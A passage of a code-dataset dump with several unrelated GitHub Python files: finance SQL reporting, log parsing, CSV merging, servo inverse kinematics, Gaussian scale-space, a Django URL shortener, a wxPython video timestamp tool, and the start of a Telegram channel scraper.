B.상관계수23, B.상관계수31 \nFROM els_kjh.issue_info A\nLEFT JOIN (SELECT * FROM els_kjh. issue_greeks_neoneo_swap WHERE 일자='%s') B\nON A.운용코드=B.운용코드\nWHERE A.상환일=0 \nAND A.종류 in (\"StepDown\", \"MonthlyStepDown\", \"StepDownNewHeart\", \"LizardStepDown\")\nAND B.액면금액>0\n\"\"\" % (dstr)\n\ncurs.execute(sql1)\nfields = [d[0] for d in curs.description]\n \n# 데이타 Fetch\nissue = curs.fetchall()\nidata = pd.DataFrame(np.array(issue), columns=fields)\n\nd1, d2 = [], []\nfor i in range(len(idata)):\n \n #기초자산기준가 / 통화\n sql = \"\"\"SELECT ParamValue FROM eqt_drvs.issue_param_short\n WHERE 운용코드='%s' AND Subcode=1 \n AND ParamName in ('할인금리', '기초자산1_기준가', '기초자산2_기준가', '기초자산3_기준가','stepdown_haski', 'StepDown_KIB') \n \"\"\" % (idata['운용코드'][i])\n curs.execute(sql)\n temp = curs.fetchall()\n temp = tuple([x[0] for x in temp])\n d2.append(temp)\n \n# Connection 닫기\nconn.close()\n\nnotional = {'U180':[], 'SPX':[], 'HSCEI':[], 'SX5E':[], 'NKY Index':[]}\ncode = {'U180':[], 'SPX':[], 'HSCEI':[], 'SX5E':[], 'NKY Index':[]}\ns0 = {'U180':0, 'SPX':0, 'HSCEI':0, 'SX5E':0, 'NKY Index':0}\nfor i in range(len(idata)):\n if d2[i][0].strip().lower()==\"no\" and d2[i][1]!=\"0\":\n x = d2[i][1].replace('%','').replace(' ','').split('/')\n if str(type(x))==\"\":\n x = x[0]\n kib = float(x)\n kib = kib/100.0 if kib>1 else kib\n for j in range(idata['기초자산수'][i]):\n notional[idata[\"기초자산코드%d\"%(j+1)][i]].append(\\\n (float(idata['액면금액'][i]), kib*float(d2[i][2+j]) / idata[\"현재가%d\"%(j+1)][i]))\n s0[idata[\"기초자산코드%d\"%(j+1)][i]]=idata[\"현재가%d\"%(j+1)][i]\n code[idata[\"기초자산코드%d\"%(j+1)][i]].append(idata[\"운용코드\"][i])\n\nrg = np.arange(1.0,0.0,-0.05)\nres = pd.DataFrame(np.zeros((len(rg)-1,len(notional.keys()))), index=rg[1:], columns=notional.keys())\nfor i in notional.keys():\n x = np.array(notional[i])\n c = np.array(code[i])\n for j in range(len(rg)-1):\n sel = (x[:,1]>rg[j+1]) * (x[:,1]<=rg[j])\n res[i][j] = sum(x[sel,0])\n if i==\"HSCEI\":\n print(c[sel])\n\nres.loc['tot'] = res.sum()\ns0 = pd.DataFrame(s0, index=[\"Cur.level\"],columns=s0.keys())\nres = s0.append(res)\nres.to_excel(\"KI_LEVEL_%s.xlsx\"%(dstr))\n\n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"paracats/MyQuantLib","sub_path":"QL/ELSDB/ELS_KI_LEVEL.py","file_name":"ELS_KI_LEVEL.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11565384635","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 12 15:10:39 2019\n\n@author: kevin_y_kuo\n\"\"\"\n\nimport os\nimport re\n\n#print r\"\\n\"\n\n\ndef matchDate(line):\n matchThis = \"\"\n matched = re.match(r'\\d\\d\\d\\d/\\d\\d/\\d\\d\\ \\d\\d:\\d\\d:\\d\\d',line) # 2018/03/14 13:53:18.266\n if matched:\n matchThis = line\n else:\n matchThis = \"NONE\"\n return matchThis\n\n\ndef getMdate(file):\n import time\n\n # os.stat return properties of a file\n tmpTime = time.localtime(os.stat(file).st_mtime)\n return time.strftime('%Y%m%d', tmpTime)\n\n\n\nlogDir = \"/Users/kevin_y_kuo/Documents/Log/\"\noutputDir = '/Users/kevin_y_kuo/Documents/Thread/'\n\n\n#%%\n# 讀取檔案修改日期\nimport time \n#import os\n\ndate_file_list = []\nfor f in os.scandir(logDir):\n #form = f.name.split('.')[1]\n if f.name.endswith(\".log\"):\n print(f.name)\n t=os.stat(f)\n lastmod_date = time.localtime(t.st_mtime) #最後修改日期時間\n print(time.strftime('%Y-%m-%d,%H:%M:%S', lastmod_date))\n date_file_tuple = lastmod_date, f.name\n date_file_list.append(date_file_tuple)\ndate_file_list.sort()\n#print(date_file_list[0][1])\n\n\n\n#%%\n# 依照時間日期重新命名並排序\nx = 0\nfor sfile in date_file_list:\n NewFileName = str(x).zfill(3) + '-' + sfile[1]\n os.rename(logDir+sfile[1],logDir+NewFileName)\n x += 1\n\n\n\n\n#%%\n# 比對所有file,找出不同的tread ID\nmatrix_str = \"\"\nmatrix_list = []\ncount = 0\nfor log in os.listdir(logDir):\n if log == \".DS_Store\":\n continue\n else:\n with open(logDir+log,'r', encoding=\"utf-16\") as f:\n for line in f:\n line = matchDate(line)\n if line == \"NONE\":\n continue\n else:\n new_line = line.strip().split(\",\")[1:2] # 取出[process:thread]部分\n str_line = \",\".join(new_line) \n if count == 0:\n matrix_str += str_line\n matrix_list.append(str_line)\n count += 1 \n if str_line in matrix_str:\n continue\n else:\n matrix_str += str_line\n matrix_list.append(str_line)\n\n\n#%%\n\nimport sys\n# 依照不同threadID創建檔案\nfor thread in matrix_list: \n output = sys.stdout\n sys.stdout = open(outputDir+thread+'.txt', 'w')\n for log in os.listdir(logDir):\n if log == \".DS_Store\":\n continue\n else:\n with open(logDir+log,'r', encoding=\"utf-16\") as f:\n for line in f:\n if thread in line:\n print(line)\n sys.stdout.close() # ordinary file object\n sys.stdout = output\n\n \n \n\n#%% \n'''\npath_debug = '/Users/kevin_y_kuo/Documents/Log/Amsp_LocalDebugLog.log'\n\n#test = []\nmatrix = \"\"\ncount = 0\nwith open(path_debug,'r', encoding=\"utf-16\") as f:\n for line in f:\n line = matchDate(line)\n #test.append(line)\n if line == \"NONE\":\n continue\n else:\n new_line = line.strip().split(\",\")[1:2]\n str_line = \",\".join(new_line) \n if count == 0:\n matrix += str_line\n count += 1 \n if str_line in matrix:\n continue\n else:\n matrix += str_line\n''' \n\n","repo_name":"KevinKuo149/Log-Parser","sub_path":"thread_classifier.py","file_name":"thread_classifier.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16776772805","text":"#!/usr/bin/env python3\n\n\"\"\" This file is here to merge individual csv files into one file\nThe csv files in a directory are read.\nThis assumes they have the same column headers.\nDue to these files being generated by the same script this is true,\nbut this program does no checking to verify this currently. \"\"\"\n\nimport os\nimport csv\nimport sys\n\ninput_path = sys.argv[1]\noutput_file_name = sys.argv[2]\n\n\n\nwith open(output_file_name, 'w', newline='') as outfile:\n\tfieldnames = ['objID', 'ra', 'dec', 'l', 'b', 'dered_u', 'dered_g', 'dered_r', 'dered_i', 'dered_z']\n\twriter = csv.DictWriter(outfile, fieldnames=fieldnames)\n\t\n\twriter.writeheader()\n\tfor root, dirs, files in os.walk(input_path):\n\t\tfor file in files:\n\t\t\tif file.endswith(\".csv\"):\n\t\t\t\t\twith open(file) as csvfile:\n\t\t\t\t\t\tprint (file)\n\t\t\t\t\t\treader = csv.DictReader(csvfile)\n\t\t\t\t\t\tfor row in reader:\n\t\t\t\t\t\t\tobjID = row['objID']\n\t\t\t\t\t\t\tra = row['ra']\n\t\t\t\t\t\t\tdec = row['dec']\n\t\t\t\t\t\t\tl = row['l']\n\t\t\t\t\t\t\tb = row['b']\n\t\t\t\t\t\t\tdered_u = row['dered_u']\n\t\t\t\t\t\t\tdered_g = row['dered_g']\n\t\t\t\t\t\t\tdered_r = row['dered_r']\n\t\t\t\t\t\t\tdered_i = row['dered_i']\n\t\t\t\t\t\t\tdered_z = row['dered_z']\n\t\t\t\t\t\t\t#print(objID)\n\t\t\t\t\t\t\t#print('{0}: ra={1}, dec={2}, dered_g={3}, dered_r={4}'.format(objID, ra, dec, dered_g, dered_r))\n\t\t\t\t\t\t\twriter.writerow({\n\t\t\t\t\t\t\t\t'objID' : objID, \n\t\t\t\t\t\t\t\t'ra':ra, \n\t\t\t\t\t\t\t\t'dec':dec, \n\t\t\t\t\t\t\t\t'l':l,\n\t\t\t\t\t\t\t\t'b':b,\n\t\t\t\t\t\t\t\t'dered_u':dered_u,\n\t\t\t\t\t\t\t\t'dered_g':dered_g,\n\t\t\t\t\t\t\t\t'dered_r':dered_r,\n\t\t\t\t\t\t\t\t'dered_i':dered_i,\n\t\t\t\t\t\t\t\t'dered_z':dered_z})\n\t\t\t\t\t\n\t\t\t\t\t\t \n\n\t\t\t\t\t\t\t\n#objID,ra,dec,l,b,dered_u,dered_g,dered_r,dered_i,dered_z\n\n","repo_name":"Jeffery-M-Thompson/Astronomy_Tools","sub_path":"mergeCSV.py","file_name":"mergeCSV.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27043628452","text":"# Simple demo of of the PCA9685 PWM servo/LED controller library.\n# This will move channel 0 from min to max position repeatedly.\n# Author: Tony DiCola\n# License: Public Domain\nfrom __future__ import division\nimport time\nimport Adafruit_PCA9685\nimport time\nimport board\nimport busio\nimport math\nimport numpy\nimport adafruit_ads1x15.ads1015 as ADS\nfrom adafruit_ads1x15.analog_in import AnalogIn\n\n# Uncomment to enable debug output.\n#import logging\n#logging.basicConfig(level=logging.DEBUG)\n# Initialise the PCA9685 using the default address (0x40).\npwm = Adafruit_PCA9685.PCA9685()\ni2c = busio.I2C(board.SCL,board.SDA)\n\n#pwm1 = Adafruit_PCA9685.PCA9685(address = 0x41)\n# Alternatively specify a different address and/or bus:\n# pwm = Adafruit_PCA9685.PCA9685(address=0x41, busnum=2)\n # Configure min and max servo pulse lengths\n\n# Initialise the PCA9685 using the default address (0x40).\n\n# Create the ADC object using the I2C bus\n# Helper function to make setting a servo pulse width simpler.\nads = ADS.ADS1015(i2c, address = 0x40)\nchan = AnalogIn(ads,ADS.P0)\nads.gain = 1\n#ads1 = ADS.ADS1015(i2c, address = 0x41)\n#chan1 = AnalogIn(ads1, ADS.P0)\n#ads1.gain = 1\ndef set_servo_pulse(channel, pulse):\n pulse_length = 1000000 # 1,000,000 us per second\n pulse_length //= 60 # 60 Hz\n print('{0}us per period'.format(pulse_length))\n pulse_length //= 4096 # 12 bits of resolution\n print('{0}us per bit'.format(pulse_length))\n pulse *= 1000\n pulse //= pulse_length\n pwm.set_pwm(channel, 0, pulse)\n\npwm.set_pwm_freq(220)\n#pwm1.set_pwm_freq(220)\nprint('Moving servo on channel 0, press Ctrl-C to quit...')\nwhile True:\n# Move servo on channel O between extremes.\n '''\n #driver 1 base joints\n pwm.set_pwm(0,0,1400)\n pwm.set_pwm(2,0,1400)\n pwm.set_pwm(4,0,1400)\n\n #driver 1 hip joints\n pwm.set_pwm(6,0,1900)\n pwm.set_pwm(8,0,1900)\n pwm.set_pwm(10,0,1900)\n\n #driver 2 base joints\n pwm1.set_pwm(0,0,1400)\n pwm1.set_pwm(2,0,1400)\n pwm1.set_pwm(4,0,1400)\n\n #driver 2 hip joints\n pwm1.set_pwm(6,0,1900)\n pwm1.set_pwm(8,0,1900)\n pwm1.set_pwm(10,0,1825)\n \n #driver 1 knee joints\n pwm.set_pwm(12,0,1525)\n pwm.set_pwm(14,0,1500)\n pwm.set_pwm(15,0,1500)\n \n #driver 2 knee joints\n pwm1.set_pwm(14,0,1375)\n pwm1.set_pwm(12,0,1350) \n pwm1.set_pwm(15,0,1450)\n time.sleep(5)\n '''\n c = 17.2 #20.1\n d = 25.5 #20.1\n b = 11 #10.1\n alpha = 0#-21 * 3.1415 / 180\n avec = [-5,0,-0.1]\n avecproj = [-5,0,0]\n cfactor = 0.91428\n for i in range(0, 628):\n \n yt = 5*math.sin(0.01*i);#was 10\n backstep = 200*math.sin(0.01*(i+157));\n rvec = [-25,yt,-40] # The desired neutral position\n rvecproj = [-15,yt,0] # Projection of rvec to normal vector\n lvecproj = numpy.subtract(rvecproj,avecproj)\n nlvec = numpy.linalg.norm(lvecproj)\n nrvec = numpy.linalg.norm(rvecproj)\n th1chk = -avec[0]*yt # Check the sign of theta 1\n \n #solve for theta 1 \n theta1 = math.degrees(math.acos((avecproj[0]**2+nlvec**2-nrvec**2)/(2*math.fabs(avecproj[0])*nlvec))) \n \n if th1chk > 0:\n theta1 = 180 - theta1\n theta1 = math.fabs(360-theta1)\n signal1 = int((theta1-180)/cfactor)\n else:\n theta1 = theta1 + 180\n theta1 = math.fabs(360-theta1)\n signal1 = int((theta1+180)/cfactor)\n\n bvec = numpy.add(avec,((numpy.multiply([math.cos(math.radians(180+theta1))*math.cos(alpha),math.sin(math.radians(180+theta1))*math.cos(alpha),math.sin(alpha)],b))))\n\n #print((numpy.multiply([math.cos(math.radians(180+theta1))*math.cos(alpha),math.sin(math.radians(180+theta1))*math.cos(alpha),math.sin(alpha)],b)))\n #print((c**2 + d**2 - (numpy.linalg.norm(numpy.subtract(bvec,rvec)))**2)/(2*c*d))\n #print(1/(2*c*d)) \n\n theta3 = math.degrees(math.acos((c**2 + d**2 - (numpy.linalg.norm(numpy.subtract(bvec,rvec)))**2)/(2*c*d))) - 180\n theta2 = math.degrees(math.acos((c**2 + (numpy.linalg.norm(numpy.subtract(bvec, rvec))**2-d**2))/(2*c*numpy.linalg.norm(numpy.subtract(bvec,rvec)))))+math.degrees(math.acos((b**2+(numpy.linalg.norm(numpy.subtract(bvec,rvec)))**2-(numpy.linalg.norm(numpy.subtract(avec,rvec))**2))/(2*b*(numpy.linalg.norm(numpy.subtract(bvec,rvec))))))-180 \n #theta3 = -1*theta3\n theta2 = -1*theta2\n # WORKS print((2*c*numpy.linalg.norm(numpy.subtract(bvec,rvec))))\n signal2 = int(theta2/cfactor*(16/3))\n if backstep < 0:\n set1offset = -30\n set2offset = 0\n else:\n set1offset = 0\n set2offset = -30\n # WORKS print( math.degrees(math.acos((c**2 + (numpy.linalg.norm(numpy.subtract(bvec, rvec))**2-d**2))/(2*c*numpy.linalg.norm(numpy.subtract(bvec,rvec))))))\n\n #print(numpy.linalg.norm(numpy.subtract(bvec,rvec)))\n #WORKS add () print((c**2 + (numpy.linalg.norm(numpy.subtract(bvec, rvec))**2-d**2)))\n #print(bvec)\n #print(theta2)\n offset = 0 \n signal3 = int(theta3/cfactor*16/3*1.55) # USE\n #pwm.set_pwm(0, 0, int(1400 - 40 * math.sin(0.01 * i)))\n #pwm.set_pwm(2, 0, int(1400 - 40 * math.sin(0.01 * i)))\n pwm.set_pwm(0, 0, 1200+signal1) # USE\n #pwm.set_pwm(6, 0, 1200+signal1)\n #pwm.set_pwm(6, 0, 1300+signal1)\n #pwm1.set_pwm(0, 0, int(1400 - 40 * math.sin(0.01 * i)))\n #pwm1.set_pwm(2, 0, int(1400 - 40 * math.sin(0.01 * i)))\n #pwm1.set_pwm(2, 0, int(1400 + 40 * math.sin(0.01 * i)))\n \n pwm.set_pwm(2, 0, 1400+ signal2 + set1offset) # USE\n print(1400 + signal2)\n #pwm.set_pwm(8, 0, int(1875 - 125 * math.sin(0.01 * i)))\n #pwm.set_pwm(10, 0, int(1875 - 125 * math.sin(0.01 * i)))\n #pwm1.set_pwm(6, 0, int(1875 - 125 * math.sin(0.01 * i)))\n #pwm1.set_pwm(8, 0, int(1875 - 125 * math.sin(0.01 * i)))\n #pwm1.set_pwm(10, 0, int(1875 -125 * math.sin(0.01 * i)))\n #pwm.set_pwm(2, 0, 1940)\n #pwm.set_pwm(12, 0, int(1525 - 70 * math.sin(0.01 * i)))\n #pwm.set_pwm(14, 0, int(1500 - 70 * math.sin(0.01 * i)))\n pwm.set_pwm(4, 0, 1450- signal3) # USE\n #pwm1.set_pwm(12, 0, int(1350 - 70 * math.sin(0.01 * i)))\n #pwm1.set_pwm(14, 0, int(1375 - 70 * math.sin(0.01 * i)))\n #pwm1.set_pwm(15, 0, int(1450 - 70 * math.sin(0.01 * i)))\n \n #print(signal3 + 1540)\n #print(c**2 + d**2 - (numpy.linalg.norm(numpy.subtract(bvec,rvec)))**2)\n #print((2*c*d))\n #print(signal3)\n \n #print(\"Theta 1 = \", theta1)\n #print(\"Theta 2 = \", theta2)\n #print(\"Theta 3 = \", theta3)\n \n time.sleep(0.02)\n #print(\"{:>5}\\t{:>5.3f}\".format(chan.value,chan.voltage),\" \",1000-i)\n #pwm.set_pwm(0,0,500)\n #time.sleep(10)\n #pwm.set_pwm(0,0,2400)\n #time.sleep(10)\n ##pwm.set_p:wm(0,0,500)\n","repo_name":"shambhavi12001/ams","sub_path":"adc_motor_test.py","file_name":"adc_motor_test.py","file_ext":"py","file_size_in_byte":6931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21557416487","text":"# This function returns a single octave in scale-space. The inputs to this\n# function are:\n#\n# img - An MxN array, representing a grayscale image or a squared DoG array\n# \n# n - The number of layers in the octave\n#\n# sigma_init - The first sigma value for the first layer in the octave\n#\n# k_init - the scaling factor for sigma\n#\n# This function returns the octave of scale-space images.\n\n# import the NumPy library\n\nimport numpy as np\n\n# import the get_gaussian_kernel() function\n\nfrom get_gaussian_kernel import get_gaussian_kernel\n\n# import the conv_FFT() function\n\nfrom conv_FFT import conv_FFT\n\ndef get_ss_octave(img,n=5,sigma_init=1.6,k_init=np.sqrt(2)):\n \n # generate the k values for the octave\n \n k = np.power(k_init,np.arange(n))\n \n # generate the sigma values for the octave\n \n sigmas = list(sigma_init*k)\n \n # initialize list to store scale-space octave layers\n \n scale_space = []\n \n for sigma in sigmas: # loop through each layer\n \n # compute the new gaussian kernel\n \n gaussian_kernel = get_gaussian_kernel(sigma)\n \n # filter the image with the new gaussian kernel\n \n g_layer = conv_FFT(img,gaussian_kernel,img_filter=False)\n \n # append result to list\n \n scale_space.append(g_layer)\n \n return scale_space\n","repo_name":"mhdadk/Image-Blob-Detection","sub_path":"src/get_ss_octave.py","file_name":"get_ss_octave.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6742209312","text":"from django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom .forms import *\nfrom django.shortcuts import get_object_or_404\nfrom .forms import UserCreationForm\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth import login, authenticate\nfrom django.contrib.auth.decorators import login_required\n\n\n@login_required(login_url='login')\ndef create_short(request):\n form = CreateUrlForm()\n links = Url.objects.filter(user=request.user)\n if request.method == 'POST':\n form = CreateUrlForm(request.POST)\n if form.is_valid():\n url = form.save(commit=False)\n url.user = request.user\n url.save()\n url = form.save()\n url.generate_short_url()\n print(url.short)\n\n print(\"success\")\n context = {\n 'links': links,\n 'form': form,\n }\n return render(request, 'service/home.html', context)\n\n\ndef page_redirect(request, url):\n url_object = get_object_or_404(Url, short=url)\n if url_object.active is True:\n response = redirect(url_object.long)\n response.status_code = 307\n return response\n else:\n context = {}\n return render(request, 'service/not_found.html', context)\n\n\ndef register_page(request):\n if request.method == 'POST':\n form = UserRegistrationForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(\n request, f'Your account has been created. You can log in now!')\n return redirect('login')\n else:\n form = UserRegistrationForm()\n context = {'form': form}\n return render(request, 'service/register_user.html', context)\n\n\ndef login_page(request):\n if request.method == \"POST\":\n form = AuthenticationForm(request, data=request.POST)\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n messages.info(request, f\"You are now logged in as {username}.\")\n return redirect(\"home\")\n else:\n messages.error(request, \"Invalid username or password.\")\n else:\n messages.error(request, \"Invalid username or password.\")\n form = AuthenticationForm()\n return render(request=request, template_name=\"service/login_user.html\", context={\"login_form\": form})\n\n\ndef logout_user(request):\n \"\"\" Log outs user\"\"\"\n logout(request)\n return redirect('login')\n\n\ndef delete_url(request, url):\n url = Url.objects.get(short=url)\n if request.method == \"POST\":\n url.delete()\n return redirect('/')\n context = {}\n return render(request, 'service/home.html', context)\n\n\ndef toggle_url(request, url):\n url = Url.objects.get(short=url)\n if request.method == \"POST\":\n url.toggle_active()\n return redirect('/')\n context = {}\n return render(request, 'service/home.html', context)\n\n\ndef change_expiration_time(request, url, datetime):\n url = Url.objects.get(short=url)\n if request.method == \"POST\":\n url.set_datetime(datetime)\n return redirect('/')\n context = {}\n return render(request, 'service/home.html', context)\n","repo_name":"balbazauras/backend-homework","sub_path":"service/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19212597331","text":"import wx\nimport cv2\nimport pandas as pd\n\n\nclass VideoPanel(wx.Panel):\n def __init__(self, parent):\n super().__init__(parent)\n\n self.ind = -1\n\n main_sizer = wx.BoxSizer(wx.VERTICAL)\n\n self.list_ctrl = wx.ListCtrl(self, size=(-1, 500),\n style=wx.LC_REPORT | wx.BORDER_SUNKEN)\n\n self.list_ctrl.InsertColumn(0, 'Location', width=100)\n self.list_ctrl.InsertColumn(1, 'Start', width=100)\n self.list_ctrl.InsertColumn(2, 'Stop', width=100)\n main_sizer.Add(self.list_ctrl, 0, 0, 5)\n self.SetSizer(main_sizer)\n\n self.list_ctrl.Bind(wx.EVT_KEY_UP, self.handle_key_up)\n self.list_ctrl.Bind(wx.EVT_KEY_DOWN, self.handle_key_down)\n\n\n self.current_time_text = wx.StaticText(self, -1, label=\"00:00:000\", pos = (520, 480))\n self.start_time_text = wx.StaticText(self, -1, label=\"00:00:000\", pos = (450, 480))\n self.end_time_text = wx.StaticText(self, -1, label=\"00:00:000\", pos=(590, 480))\n self.current_frame_text = wx.StaticText(self, -1, label=\"0\", pos=(520, 500))\n self.start_frame_text = wx.StaticText(self, -1, label=\"0\", pos=(450, 500))\n self.end_frame_text = wx.StaticText(self, -1, label=\"0\", pos=(590, 500))\n self.trim_end_button = wx.Button(self, -1, label=\"Trim end\", pos=(400, 520))\n self.trim_start_button = wx.Button(self, -1, label=\"Trim start\", pos=(300, 520))\n self.delete_button = wx.Button(self, -1, label=\"Delete\", pos=(500, 520))\n self.DI_text = wx.StaticText(self, -1, label=\"DI:\", pos=(600, 520))\n\n self.play_video = False\n self.reverse = False\n self.key_down = False\n self.render = False\n self.Bind(wx.EVT_KEY_UP, self.handle_key_down)\n self.Bind(wx.EVT_KEY_DOWN, self.handle_key_down)\n\n self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.handle_select_timestamp, self.list_ctrl)\n\n self.trim_start_button.Bind(wx.EVT_BUTTON, self.trim_start)\n self.trim_end_button.Bind(wx.EVT_BUTTON, self.trim_end)\n\n self.delete_button.Bind(wx.EVT_BUTTON, self.delete_timestamp)\n\n\n def trim_start(self, event):\n if self.ind == -1:\n return\n\n self.data[self.ind][\"start\"] = self.current_frame\n\n self.update(self.data, self.ind)\n self.Refresh()\n\n def trim_end(self, event):\n if self.ind == -1:\n return\n\n self.data[self.ind][\"stop\"] = self.current_frame\n\n self.update(self.data, self.ind)\n self.Refresh()\n\n def delete_timestamp(self, event):\n if self.ind == -1:\n return\n self.pause()\n self.reverse = False\n\n del self.data[self.ind]\n\n self.ind -= 1\n self.update(self.data, self.ind)\n self.Refresh()\n\n\n def save_timestamps(self, filepath):\n\n # Convert data to timestamps\n save_data = []\n\n for timestamp in self.data:\n new_timestamp = timestamp\n new_timestamp[\"start\"] = self.video.format_time(self.video.timestamp(int(timestamp[\"start\"])))\n new_timestamp[\"stop\"] = self.video.format_time(self.video.timestamp(int(timestamp[\"stop\"])))\n\n save_data.append(new_timestamp)\n\n df = pd.DataFrame(save_data)\n print(df)\n df.to_csv(filepath)\n\n\n def update(self, data, ind=-1):\n self.data = data\n self.list_ctrl.ClearAll()\n self.list_ctrl.InsertColumn(0, 'Location', width=100)\n self.list_ctrl.InsertColumn(1, 'Start', width=100)\n self.list_ctrl.InsertColumn(2, 'Stop', width=100)\n\n index = 0\n for timestamp in data:\n self.list_ctrl.InsertItem(index, timestamp[\"location\"])\n self.list_ctrl.SetItem(index, 1, str(timestamp[\"start\"]))\n self.list_ctrl.SetItem(index, 2, str(timestamp[\"stop\"]))\n index += 1\n\n # After loading timestamp, select first data\n if ind != -1:\n self.ind = ind\n self.list_ctrl.Select(ind)\n else:\n self.ind = 0\n self.list_ctrl.Select(0)\n\n # If we have a video, select timeframe\n if hasattr(self, \"video\"):\n self.render = True\n self.set_timeframe(data[self.ind][\"start\"], data[self.ind][\"stop\"])\n\n def set_timeframe(self, start_frame, end_frame):\n self.start_frame = int(start_frame)\n self.end_frame = int(end_frame)\n self.current_frame = int(start_frame)\n\n self.render_text()\n\n def calculate_DI(self):\n new = 0\n old = 0\n for timestamp in self.data:\n if timestamp['location'][1] == \"L\":\n new += self.video.timestamp(int(timestamp[\"stop\"])) - self.video.timestamp(int(timestamp[\"start\"]))\n else:\n old += self.video.timestamp(int(timestamp[\"stop\"])) - self.video.timestamp(int(timestamp[\"start\"]))\n return new / (new + old)\n\n\n def render_text(self):\n self.start_frame_text.SetLabel(str(self.start_frame))\n self.current_frame_text.SetLabel(str(self.current_frame))\n self.end_frame_text.SetLabel(str(self.end_frame))\n self.start_time_text.SetLabel(self.video.format_time(self.video.timestamp(self.start_frame)))\n self.current_time_text.SetLabel(self.video.format_time(self.video.timestamp(self.current_frame)))\n self.end_time_text.SetLabel(self.video.format_time(self.video.timestamp(self.end_frame)))\n\n self.DI_text.SetLabel(\"{0:.2f}\".format(self.calculate_DI()))\n\n\n\n # on loading video, check if file is loaded\n def load_video(self, video):\n self.play_video = False\n self.reverse = False\n self.render = False\n self.video = video\n\n\n if hasattr(self, 'timer'):\n self.timer.Stop()\n\n print(\"loaded video\")\n if hasattr(self, \"data\"):\n print(\"has data\")\n # After loading timestamp, select first data\n self.list_ctrl.Select(self.ind)\n\n # If we have a video, select timeframe\n self.set_timeframe(self.data[self.ind][\"start\"], self.data[self.ind][\"stop\"])\n self.render = True\n else:\n self.start_frame = 0\n self.end_frame = 0\n\n self.current_frame = 0\n\n\n f = cv2.cvtColor(video.frames[self.current_frame], cv2.COLOR_BGR2RGB)\n\n self.bmp = wx.Bitmap.FromBuffer(448, 448, f)\n self.Refresh()\n\n self.timer = wx.Timer(self)\n self.timer.Start(1000. / video.fps)\n\n self.Bind(wx.EVT_PAINT, self.OnPaint)\n self.Bind(wx.EVT_TIMER, self.NextFrame)\n\n\n def play(self):\n self.play_video = True\n\n def pause(self):\n self.play_video = False\n\n def handle_key_down(self, event):\n if not hasattr(self, \"video\"):\n return\n\n keycode = event.GetKeyCode()\n\n if self.key_down:\n return\n\n if keycode == 46:\n self.key_down = True\n self.play()\n elif keycode == 44:\n\n self.key_down = True\n self.play()\n self.reverse = True\n\n\n def handle_key_up(self, event):\n if not hasattr(self, \"video\"):\n return\n keycode = event.GetKeyCode()\n\n if keycode == wx.WXK_SPACE:\n if self.key_down:\n return\n if self.play_video:\n self.pause()\n else:\n self.play()\n elif keycode == 46:\n self.key_down = False\n self.pause()\n elif keycode == 44:\n self.key_down = False\n\n self.pause()\n self.reverse = False\n\n def handle_select_timestamp(self, event):\n ind = event.Index\n self.ind = ind\n # If we have a video, select timeframe\n if hasattr(self, \"video\"):\n self.play_video = False\n self.reverse = False\n self.set_timeframe(self.data[ind][\"start\"], self.data[ind][\"stop\"])\n self.render = True\n f = cv2.cvtColor(self.video.frames[self.current_frame], cv2.COLOR_BGR2RGB)\n self.bmp.CopyFromBuffer(f)\n self.Refresh()\n\n\n\n\n def OnPaint(self, evt):\n dc = wx.BufferedPaintDC(self)\n dc.Clear()\n if self.render:\n dc.DrawBitmap(self.bmp, 330, 0)\n\n def NextFrame(self, event):\n\n if self.play_video is False:\n return\n\n if self.reverse:\n if self.current_frame > self.start_frame:\n self.current_frame -= 1\n else:\n self.current_frame = self.end_frame - 1\n else:\n if self.current_frame < self.end_frame - 1:\n self.current_frame += 1\n else:\n self.current_frame = self.start_frame\n\n f = cv2.cvtColor(self.video.frames[self.current_frame], cv2.COLOR_BGR2RGB)\n self.bmp.CopyFromBuffer(f)\n self.Refresh()\n\n # Render timestamp + frame number on screen\n self.render_text()\n","repo_name":"yixiongsun/objectlocationmemory","sub_path":"panels.py","file_name":"panels.py","file_ext":"py","file_size_in_byte":8968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17149189796","text":"def compare_files(file1_path, file2_path):\n with open(file1_path, 'r') as file1, open(file2_path, 'r') as file2:\n i =0\n while True:\n char1 = file1.read(1)\n char2 = file2.read(1)\n i+=1\n if char1 != char2:\n print(char1)\n print(char2)\n print(i)\n return False\n if not char1:\n return True\n \n\nif compare_files('out_file_name.txt', 'temp.txt'):\n print('The files match')\nelse:\n print('The files do not match')","repo_name":"tejasbv/CS6348","sub_path":"myProgram/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39431947318","text":"import datetime\nimport logging\nimport os\nimport pandas as pd\nimport shutil\nfrom data_model import CHATS_COLUMNS, SCANNED_COLUMNS, NODES_COLUMNS, EDGES_COLUMNS, MESSAGES_COLUMNS\nfrom telegram import SyncTelegramClient\nfrom telethon.errors.rpcerrorlist import ChannelPrivateError\nimport traceback\nfrom tqdm import tqdm\n\nfrom chat_lists import misinformation_channel_usernames, misinformation_channel_ids\n\n# Initialize telegram client\ntelethon_api = 